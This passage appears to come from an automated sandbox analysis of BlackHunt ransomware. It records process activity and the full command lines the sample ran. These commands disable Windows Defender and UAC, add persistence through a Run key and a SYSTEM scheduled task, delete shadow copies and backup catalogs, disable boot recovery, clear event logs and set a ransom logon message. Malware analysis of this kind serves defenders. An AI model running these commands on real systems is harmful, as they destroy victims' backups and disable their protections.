of 2172 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 114 PID 1932 wrote to memory of 2588 1932 cmd.exe 113 PID 1932 wrote to memory of 2588 1932 cmd.exe 113 PID 1800 wrote to memory of 748 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 116 PID 1800 wrote to memory of 748 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 116 PID 1800 wrote to memory of 1828 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 118 PID 1800 wrote to memory of 1828 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 118 PID 1800 wrote to memory of 2244 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 120 PID 1800 wrote to memory of 2244 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 120 PID 1800 wrote to memory of 400 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 121 PID 1800 wrote to memory of 400 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 121 PID 1800 wrote to memory of 772 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 187 PID 1800 wrote to memory of 772 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 187 PID 4188 wrote to memory of 2052 4188 cmd.exe 123 PID 4188 wrote to memory of 2052 4188 cmd.exe 123 PID 3888 wrote to memory of 3772 3888 cmd.exe 176 PID 3888 wrote to memory of 3772 3888 cmd.exe 176 PID 1904 wrote to memory of 2232 1904 cmd.exe 128 PID 1904 wrote to memory of 2232 1904 cmd.exe 128 PID 2172 wrote to memory of 2204 2172 cmd.exe 129 PID 2172 wrote to memory of 2204 2172 cmd.exe 129 PID 1800 wrote to memory of 4692 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 133 PID 1800 wrote to memory of 4692 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 133 PID 1800 wrote to memory of 4472 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 130 PID 1800 wrote to memory of 4472 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 130 PID 1800 wrote to memory of 4884 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 132 PID 1800 wrote to memory of 4884 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 132 PID 1800 wrote to memory of 2304 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 136 PID 1800 wrote to memory of 2304 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 136 PID 748 wrote to memory of 2512 748 cmd.exe 138 PID 748 wrote to memory of 2512 748 cmd.exe 138 PID 1800 wrote to memory of 808 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 139 PID 1800 wrote to memory of 808 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 139 PID 772 wrote to memory of 2784 772 Conhost.exe 183 PID 772 wrote to memory of 2784 772 Conhost.exe 183 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe"C:\Users\Admin\AppData\Local\Temp\eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1800 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵PID:864
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:1520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:3480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3796 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:1852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:976 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:368 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4188 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:3772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:1828
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:5084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2244
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:3372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:400
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:772
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:4472
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:3728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4884
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:4692
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:3036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2304
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:4252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:808
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2908
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:4824
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1804
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:3332
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4244
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:3720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4680
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:5048
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2860
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1824
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe" /F2⤵PID:3392
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe" /F3⤵
- Creates scheduled task(s)
PID:1704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:3772
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2312
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:3312
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:3768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:68
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2904
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:4944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1596
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1996
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4596
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:6204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵
- Modifies registry class
PID:3480 -
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:6876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3644
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:9136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:5596
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:11712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:7248
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:7776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:7556
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:14888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:11096
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:12624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:7160
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:9396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:6960
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:9556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:7048
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:9572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:6272
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:8112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:6276
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:8220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:12664
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:8148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:7940
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:8248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2204
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:8484
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:14728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:5152
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:14744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:6672
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:2836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:14612
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:15204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:14972
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:14396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:14656
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:10332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:14992
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:15800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:14756
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:14388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:10468
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:14820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:2412 -
